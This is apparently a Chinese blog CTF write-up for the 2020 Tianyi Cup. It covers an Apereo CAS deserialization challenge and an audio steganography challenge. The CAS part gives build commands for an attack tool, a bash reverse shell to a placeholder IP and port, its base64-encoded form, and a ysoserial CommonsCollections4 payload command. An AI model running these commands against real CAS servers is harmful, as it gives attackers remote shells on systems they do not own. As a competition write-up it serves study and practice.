Python小子-

2020中国电信天翼杯-wp

2020-8-1 3:50 作者:小林子 | |

web2:apereocas

根据题目提示+上网搜索相关漏洞=反序列化漏洞
1.准备
下载https://github.com/vulhub/Apereo-CAS-Attack
下载ysoserial链接:https://pan.baidu.com/s/1THt2x_jDPWFm1wNS_0Z1Zw   提取码:741u

2.安装
Install it to local maven:
#mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file -Dfile=ysoserial-0.0.6-SNAPSHOT-BETA-all.jar -DgroupId=ysoserial -DartifactId=ysoserial -Dversion=0.0.6 -Dpackaging=jar -DlocalRepositoryPath=my-repo 

Build JAR file:
#
mvn clean package assembly:single

3.执行
反弹shell: bash -i >& /dev/tcp/ip/port 0>&1  (你的服务器ip和监听端口)
shell进行base64加密:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}

#java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash -i}"
5bf990f5177bab46772bb884ca606b7.jpg
替换execution参数
微信截图_20200801143651.jpg
监听服务器将收到会话,getshell成功。



音频隐写

(采于贝塔安全实验室)

1.notepad++打开音频文件

66f91231e3d3a880503f6e598cddf5c.jpg
2.使用Audacity软件打开,选择频谱分析
微信图片_20200804231844.jpg

3.选择波形分析,发现再最开始有一规律变化的波形。猜测该波形可能对应二进制的01变化,高电平表示1,低电平表示0
微信截图_20200804231922.jpg
对上面的二进制数转换成字符串,得到隐藏信息:psdA:83979367
4.打开OpenPuff软件,点击Unhide按钮,在A,B,C输入密码处分别输入:83979367、74208645、01374890。然后点击Add Carriers 按钮先择要进行提取的音频文件,最后点击Unhide按钮,选择将提取文件存放的位置,之后就可以看到,提取到的flag文件了。
微信截图_20200804231943.jpg



文章作者:小林子
文章地址:http://www.xlzweb.top/post-33.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!


Powered by 小林子 & Python小子

CopyRight © 2017-2018 Python小子.  All rights reserved.